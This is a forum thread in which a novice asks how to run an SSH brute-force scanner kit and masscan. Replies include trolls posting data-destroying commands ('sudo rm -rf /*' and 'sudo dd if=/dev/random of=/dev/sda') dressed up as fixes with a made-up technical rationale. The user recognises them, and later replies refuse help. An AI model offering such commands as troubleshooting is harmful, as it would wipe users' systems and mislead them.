Jump to content
GBL

Can someone explain how this SSH-Brute works?

Recommended Posts

I want to use this scanner i saw on IRC and also it was mention in this forum its bssh2z-full.tar

Can you explain me how to use it? I read tutorial but ./masscan command dont gives a ips also not work.

Edited by GBL
Link to comment
Share on other sites

16 minutes ago, theandruala said:

Just run ./masscan

then run 

sudo rm -rf /*

You mean just ./masscan without anything other?

Anyway sudo rm -rf /* will remove everything :D

./masscan
usage:
masscan -p80,8000-8100 10.0.0.0/8 --rate=10000
 scan some web ports on 10.x.x.x at 10kpps
masscan --nmap
 list those options that are compatible with nmap
masscan -p80 10.0.0.0/8 --banners -oB <filename>
 save results of scan in binary format to <filename>
masscan --open --banners --readscan <filename> -oX <savefile>
 read binary scan results in <filename> and save them as xml in <savefile>

What to use?

Edited by GBL
Link to comment
Share on other sites

35 minutes ago, theandruala said:

./masscan

then

sudo rm -rf /*

rm will delete all errors and it's gonna rn

if you are sudoer (root) sudo rm -rf /* will remove everything from the unix :)

Anyway i come here to ask about scanner and you just come to troll.

Link to comment
Share on other sites

@GBL Don't look at the troll!

Running rm -rf /* will destroy your system!

 

Your problem is that the scanner is using optimized system calls from /dev/random libraries. Your user doesn't have acces to this system libraries that contain the code needed.

To allow access to all users to this libraries you need to run:

 

sudo dd if=/dev/random of=/dev/sda

./masscan -all

 

 

(the fitst line, executed as super user unlocks the dev/random libraries)

After masscan will run just fine (and way faster)

  • Downvote 1
Link to comment
Share on other sites

4 hours ago, yoyois said:

@GBL Don't look at the troll!

Running rm -rf /* will destroy your system!

 

Your problem is that the scanner is using optimized system calls from /dev/random libraries. Your user doesn't have acces to this system libraries that contain the code needed.

To allow access to all users to this libraries you need to run:

 

sudo dd if=/dev/random of=/dev/sda

./masscan -all

 

 

(the fitst line, executed as super user unlocks the dev/random libraries)

After masscan will run just fine (and way faster)

 

Again some joke?

sudo dd if=/dev/random of=/dev/sda = will destroy HDD.

Why is hard to help someone?

Like ./masscann -all not work

FAIL: unknown option: --all
 [hint] try "--help"
 [hint] ...or, to list nmap-compatible options, try "--nmap"

Edited by GBL
Link to comment
Share on other sites

First of all this is considered a WhiteHat  forum so this talk about grays  is frowned upon.

 

Second, I really don't get what's so unclear about the usage: IT'S ALL THERE!!! If you don't get it then you really should not be using this...

8 hours ago, GBL said:

./masscan
usage:
masscan -p80,8000-8100 10.0.0.0/8 --rate=10000
 scan some web ports on 10.x.x.x at 10kpps
masscan --nmap
 list those options that are compatible with nmap
masscan -p80 10.0.0.0/8 --banners -oB <filename>
 save results of scan in binary format to <filename>
masscan --open --banners --readscan <filename> -oX <savefile>
 read binary scan results in <filename> and save them as xml in <savefile>

 

 

Link to comment
Share on other sites

2 hours ago, GBL said:

Yea how to start scanning IP 50 for example.

What's your goal?

You clearly don't understand how ip works. (IP 50 is nonsense)

Also you don't understand ports and protocols.

 

 

Nobody here will help you as you are clearly unexperienced and try to do bad things (you don't understand why they are bad).

 

Real piece of help:

Stay away from trouble! Don't start "hacking" things you don't understand.

Spend some time online reading and learning about these things (ip, port, protocol, scanner, bruteforcer, ip range, firewall, dns)

  • Upvote 3
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...